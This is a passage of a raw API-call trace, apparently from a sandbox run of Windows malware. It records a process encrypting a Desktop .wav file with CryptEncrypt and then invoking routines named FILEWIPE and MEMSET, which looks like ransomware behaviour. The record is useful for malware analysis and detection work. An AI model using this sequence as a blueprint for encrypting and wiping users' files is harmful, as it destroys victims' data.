[0032.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0032.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.469] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da278, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da278*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0032.470] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.470] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0032.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0032.471] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.471] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.471] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.471] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0032.471] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.471] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.471] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.471] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.471] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.471] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0032.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0032.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.472] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0032.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.472] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x13bb6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x13bc0) returned 1 [0032.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.473] CharLowerBuffW (in: lpsz="byte[80833]", cchLength=0xb | out: lpsz="byte[80833]") returned 0xb [0032.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.474] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.474] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.474] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.474] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b3b78*, pdwDataLen=0x6ae220*=0x13bb6, dwBufLen=0x13bc0 | out: pbData=0x8b3b78*, pdwDataLen=0x6ae220*=0x13bc0) returned 1 [0032.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.475] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.475] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.476] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.476] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.476] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.476] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.476] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.476] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.476] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.482] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.482] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.482] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.486] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.486] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.486] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.486] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.486] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0032.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.486] CryptDestroyKey (hKey=0x7c2200) returned 1 [0032.487] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.487] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.487] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.487] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.487] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.487] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.487] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.487] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.487] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.487] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.487] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.488] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.488] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.488] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.488] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0032.488] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.488] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.488] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.488] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.488] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.488] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.488] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.489] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.490] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.491] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.491] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.491] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.491] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.491] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe74f0990, ftCreationTime.dwHighDateTime=0x1d5c506, ftLastAccessTime.dwLowDateTime=0xb2382ea0, ftLastAccessTime.dwHighDateTime=0x1d5bf46, ftLastWriteTime.dwLowDateTime=0xb2382ea0, ftLastWriteTime.dwHighDateTime=0x1d5bf46, nFileSizeHigh=0x0, nFileSizeLow=0x13bb6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="_WgswrxrAQIdMFU5.wav", cAlternateFileName="_WGSWR~1.WAV")) returned 0x7c2240 [0032.491] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.491] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.491] CharLowerBuffW (in: lpsz="byte[80822]", cchLength=0xb | out: lpsz="byte[80822]") returned 0xb [0032.492] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.492] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.492] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.492] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.492] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.492] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 